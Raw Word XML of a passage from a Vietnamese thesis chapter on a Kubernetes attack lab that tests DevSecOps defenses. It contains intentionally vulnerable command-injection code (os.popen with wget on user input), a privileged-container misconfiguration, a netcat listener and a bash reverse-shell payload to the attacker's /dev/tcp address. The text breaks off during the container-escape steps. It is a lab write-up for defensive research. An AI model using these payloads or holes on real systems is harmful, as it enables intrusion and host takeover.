    <w:p w14:paraId="27B63EB2" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc235976374"/>
      <w:r w:rsidRPr="002A16DE">
        <w:t>Kết luận c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="15900A7C" w14:textId="3C5A4186" w:rsidR="00204C0D" w:rsidRPr="00175415" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Hlk236003329"/>
      <w:r w:rsidRPr="002A16DE">
        <w:t xml:space="preserve">Chương </w:t>
      </w:r>
      <w:r w:rsidR="00811D56">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002A16DE">
        <w:t xml:space="preserve"> đã đề xuất và chứng minh tính hiệu quả của mô hình phòng thủ đa lớp (Defense-in-Depth) theo chu trình DevSecOps, với trọng tâm là kiến trúc Zero-Trust. Bằng cách kết hợp hài hòa các công cụ bảo mật tĩnh (Trivy, Harbor) và phòng thủ runtime chủ động (Seccomp, Falco, Calico), giải pháp đã tạo ra một "vòng lặp bảo mật kín", giúp ngăn chặn từ các mối đe dọa đã biết đến những kỹ thuật tinh vi như tấn công 0-day.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="68"/>
    <w:p w14:paraId="70B462DC" w14:textId="77777777" w:rsidR="00204C0D" w:rsidRPr="00204C0D" w:rsidRDefault="00204C0D" w:rsidP="00204C0D">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2A1AFC" w14:textId="115F48DD" w:rsidR="00FA6802" w:rsidRPr="00204C0D" w:rsidRDefault="00FA6802" w:rsidP="00FA6802">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00204C0D">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C783D9" w14:textId="43487C03" w:rsidR="00026BE1" w:rsidRPr="00E15D80" w:rsidRDefault="00026BE1" w:rsidP="00E15D80">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc235976375"/>
      <w:r w:rsidRPr="00E15D80">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">THỰC NGHIỆM PHƯƠNG THỨC TẤN CÔNG VÀ </w:t>
      </w:r>
      <w:r w:rsidR="00E15D80" w:rsidRPr="00E15D80">
        <w:t>giải pháp phòng vệ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w14:paraId="7519DF44" w14:textId="566EA3F5" w:rsidR="00026BE1" w:rsidRPr="009E0111" w:rsidRDefault="00026BE1" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc235976376"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Giới thiệu chương</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="4CACBFB0" w14:textId="1FD4DE88" w:rsidR="00026BE1" w:rsidRPr="00175415" w:rsidRDefault="00026BE1" w:rsidP="00FB3175">
      <w:r w:rsidRPr="00175415">
        <w:t>Nhằm mục đích chứng minh tính khả thi của các lý thuyết lỗ hổng đã phân tích tại Chương 2</w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t xml:space="preserve"> và giải pháp phòng thủ tại </w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve">Chương </w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t>4, học viên</w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve"> sẽ tập trung vào việc xây dựng môi trường phòng thí nghiệm thực tế để tiến hành các kịch bản thực nghiệm tấn công giả định - PoC. Quá trình thực nghiệm sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t>mô phỏng</w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve"> lại các véc-tơ tấn công nguy hiểm </w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t xml:space="preserve">như </w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve">khai thác lỗ hổng cấu hình đặc quyền để thoát chuồng chiếm quyền điều khiển Host OS, đánh cắp cấu phần định danh Service Account để </w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t>kiểm soát</w:t>
      </w:r>
      <w:r w:rsidRPr="00175415">
        <w:t xml:space="preserve"> cụm Kubernetes, và thực hiện tấn công nghe lén dữ liệu mạng nội bộ.</w:t>
      </w:r>
      <w:r w:rsidR="00CB3206" w:rsidRPr="00175415">
        <w:t xml:space="preserve"> Kết quả sẽ sử dụng để đánh giá hiệu năng và khả năng chặn bắt các hành vi tấn công bằng giải pháp đã xây dựng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A429B48" w14:textId="6FADCA20" w:rsidR="00026BE1" w:rsidRPr="009E0111" w:rsidRDefault="00026BE1" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc235976377"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Thiết lập Môi trường Thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="3DEDAB51" w14:textId="77777777" w:rsidR="00482F63" w:rsidRDefault="00482F63" w:rsidP="00482F63">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C363A1E" wp14:editId="1B3C4691">
            <wp:extent cx="1972101" cy="2606821"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3175"/>
            <wp:docPr id="119987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8731" cy="2628803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AADC6E0" w14:textId="56BFB659" w:rsidR="00482F63" w:rsidRPr="00482F63" w:rsidRDefault="00482F63" w:rsidP="00482F63">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc236001529"/>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w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mô hình thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="084BD28E" w14:textId="77777777" w:rsidR="00026BE1" w:rsidRPr="00482F63" w:rsidRDefault="00026BE1" w:rsidP="00FB3175">
      <w:r w:rsidRPr="00FB3175">
        <w:t>Môi trường phòng thí nghiệm được cấu hình bằng hệ thống máy chủ ảo hóa cục bộ để đảm bảo tính an toàn cô lập</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD94A4E" w14:textId="03A122CD" w:rsidR="00026BE1" w:rsidRPr="00482F63" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00482F63">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hạ tầng cụm máy chủ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve"> 01 Cụm Kubernetes Cluster gồm 01 Master Node (2 vCPU, 4GB RAM) và 0</w:t>
      </w:r>
      <w:r w:rsidR="00482F63" w:rsidRPr="00482F63">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00482F63">
        <w:t xml:space="preserve"> Worker Nodes (2 vCPU, 4GB RAM) vận hành trên nền tảng hệ điều hành Ubuntu Server 22.04 LTS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E047F6F" w14:textId="77777777" w:rsidR="00026BE1" w:rsidRPr="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cấu phần Runtime tầng thấp:</w:t>
      </w:r>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Trình thực thi containerd v1.7 và runc v1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D998AC8" w14:textId="77777777" w:rsidR="00026BE1" w:rsidRPr="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ứng dụng mục tiêu (Target):</w:t>
      </w:r>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Triển khai một hệ thống ứng dụng Microservices giả lập thương mại điện tử. Trong đó, ứng dụng Web Frontend hướng ngoài được cố ý chèn sẵn một lỗ hổng Command Injection (Tiêm câu lệnh hệ thống) tại tính năng xử lý ảnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E031C" w14:textId="77777777" w:rsidR="00026BE1" w:rsidRPr="00026BE1" w:rsidRDefault="00026BE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Máy tấn công (Attacker):</w:t>
      </w:r>
      <w:r w:rsidRPr="00026BE1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sử dụng hệ điều hành Kali Linux nằm cùng dải mạng nội bộ với cụm máy chủ Lab, được trang bị các công cụ kiểm thử như Nmap, Burp Suite và Kubectl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011585B2" w14:textId="77777777" w:rsidR="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D54976C" wp14:editId="309D5C5B">
            <wp:extent cx="5218368" cy="1821976"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6985"/>
            <wp:docPr id="1401826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26953" cy="1824973"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A04BD" w14:textId="2B07DAFE" w:rsidR="00026BE1" w:rsidRPr="00C32400" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc236001530"/>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2</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:t>. Sơ đồ luồng thực nghiệm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="7514B002" w14:textId="1874395D" w:rsidR="00026BE1" w:rsidRPr="009E0111" w:rsidRDefault="00026BE1" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc235976378"/>
      <w:r w:rsidRPr="009E0111">
        <w:t xml:space="preserve">Kịch bản </w:t>
      </w:r>
      <w:r w:rsidR="00C50BFB" w:rsidRPr="009E0111">
        <w:t>TN-0</w:t>
      </w:r>
      <w:r w:rsidRPr="009E0111">
        <w:t>1: Tấn công thoát chuồng (Container Escape) qua cấu hình sai Đặc quyền</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="20CC25A7" w14:textId="6CDA75D0" w:rsidR="008D58A8" w:rsidRPr="009E0111" w:rsidRDefault="008D58A8" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc235976379"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="1406181D" w14:textId="77777777" w:rsidR="008D58A8" w:rsidRPr="009823E1" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:r w:rsidRPr="009823E1">
        <w:t>Từ quyền truy cập ban đầu thu được bên trong container Frontend, kẻ tấn công bẻ gãy ranh giới cô lập để nhảy ra ngoài (Escape), chiếm quyền điều khiển đặc quyền root trực tiếp trên hệ điều hành của máy chủ host vật lý (worker01).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24087B99" w14:textId="18729D36" w:rsidR="008D58A8" w:rsidRPr="009E0111" w:rsidRDefault="008D58A8" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc235976380"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Điều kiện kích hoạt lỗi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="747A657C" w14:textId="77777777" w:rsidR="008D58A8" w:rsidRPr="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F242453" w14:textId="16943C23" w:rsidR="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Quản trị viên cấu hình sai lầm nghiêm trọng trong file deployment khi kích hoạt chế độ siêu đặc quyền (privileged: true) cho container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D36093" w14:textId="77777777" w:rsidR="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51F77F41" wp14:editId="28CE5643">
            <wp:extent cx="4660710" cy="1272549"/>
            <wp:effectExtent l="0" t="0" r="6985" b="3810"/>
            <wp:docPr id="136680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06332" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4668919" cy="1274790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FB2A32" w14:textId="64DDCC2C" w:rsidR="008D58A8" w:rsidRPr="009823E1" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc236001531"/>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3</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:t>. Cấu hình dẫn đến khai thác lỗi Misconfiguratio</w:t>
      </w:r>
      <w:r w:rsidRPr="00C32400">
        <w:t>n</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="592B6D50" w14:textId="236610D4" w:rsidR="00D27793" w:rsidRPr="009823E1" w:rsidRDefault="00D27793" w:rsidP="00D27793">
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve">Tại tầng ứng dụng (Web Application Layer): Tính năng xử lý và nén ảnh từ kho cung ứng bị lập trình lỗi Command Injection. Do lập trình viên sử dụng hàm nối chuỗi hệ thống nguy hiểm </w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os.popen(f"wget -qO- '{image_url}'")</w:t>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t xml:space="preserve"> mà không triển khai bất kỳ cơ chế kiểm duyệt dữ liệu đầu vào, cho phép hacker chèn thêm các ký tự điều khiển luồng (như ;, &amp;, |) để thực thi mã lệnh tùy ý dưới quyền root của container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5735FA11" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="00D27793" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00D27793">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B3ED1F8" wp14:editId="31D54D54">
            <wp:extent cx="4702799" cy="1890215"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="1863376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76259" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4712338" cy="1894049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D0C30" w14:textId="66B95EDD" w:rsidR="00D27793" w:rsidRPr="008A233C" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc236001532"/>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4</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Đoạn mã chứa lỗi cho phép hacker khai thác trước khi tấn công escape trong container</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="382F2A22" w14:textId="52EC0349" w:rsidR="008D58A8" w:rsidRPr="009E0111" w:rsidRDefault="008D58A8" w:rsidP="009E0111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc235976381"/>
      <w:r w:rsidRPr="009E0111">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="3791BA84" w14:textId="77777777" w:rsidR="008D58A8" w:rsidRPr="00C32400" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:r w:rsidRPr="00C32400">
        <w:t xml:space="preserve">Thiết lập Reverse Shell: Kẻ tấn công dùng máy Kali Linux mở cổng lắng nghe nc -lvnp 4444. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73566D43" w14:textId="77777777" w:rsidR="008A233C" w:rsidRDefault="008D58A8" w:rsidP="008A233C">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1078BB08" wp14:editId="02ABEB91">
            <wp:extent cx="3286584" cy="1238423"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="41067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74543" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3286584" cy="1238423"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B49AEC" w14:textId="0855E1E1" w:rsidR="008D58A8" w:rsidRPr="009823E1" w:rsidRDefault="008A233C" w:rsidP="008A233C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc236001533"/>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5</w:t>
      </w:r>
      <w:r w:rsidR="00175415">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009823E1">
        <w:t>. Hacker mở cổng 4444 lắng nghe kết nối khi khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="2BF25C7B" w14:textId="698F95C6" w:rsidR="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009823E1">
        <w:t>Thông qua giao diện Web mục tiêu tại cổng 30080, kẻ tấn công tiêm chuỗi payload độc hại vào ô URL:Plaintexthttps://google.com'; bash -c 'bash -i &gt;&amp; /dev/tcp/10.15.xx.173/4444 0&gt;&amp;1'; '</w:t>
      </w:r>
      <w:r w:rsidR="00D27793" w:rsidRPr="009823E1">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D27793">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong đó 10.15.xx.173 là địa chỉ của máy hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C24ABB4" w14:textId="78F807CC" w:rsidR="001A486E" w:rsidRPr="008D58A8" w:rsidRDefault="001A486E" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E5010B9" wp14:editId="680A6EE3">
            <wp:extent cx="4878666" cy="1296538"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2085469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69434" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4887354" cy="1298847"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD2A70A" w14:textId="734CEEE7" w:rsidR="008D58A8" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hệ thống backend thực thi ngầm qua hàm </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>os.popen()</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, trả về một phiên shell tương tác </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@web-frontend-xxx:/#</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> về cho máy Kali.Kiểm tra năng lực đặc quyền (Capabilities Check): Tại shell vừa chiếm được, kẻ tấn công kiểm tra quyền bằng lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBBAB60" w14:textId="2D6ABCBB" w:rsidR="001A486E" w:rsidRPr="008D58A8" w:rsidRDefault="001A486E" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="72D7252D" wp14:editId="367B919B">
            <wp:extent cx="4865427" cy="445582"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="117055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51129" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4888894" cy="447731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0E73E" w14:textId="77777777" w:rsidR="001A486E" w:rsidRDefault="008D58A8" w:rsidP="008D58A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kết quả hiển thị quyền </w:t>
      </w:r>
      <w:r w:rsidRPr="001A486E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cap_sys_admin</w:t>
      </w:r>
      <w:r w:rsidRPr="008D58A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
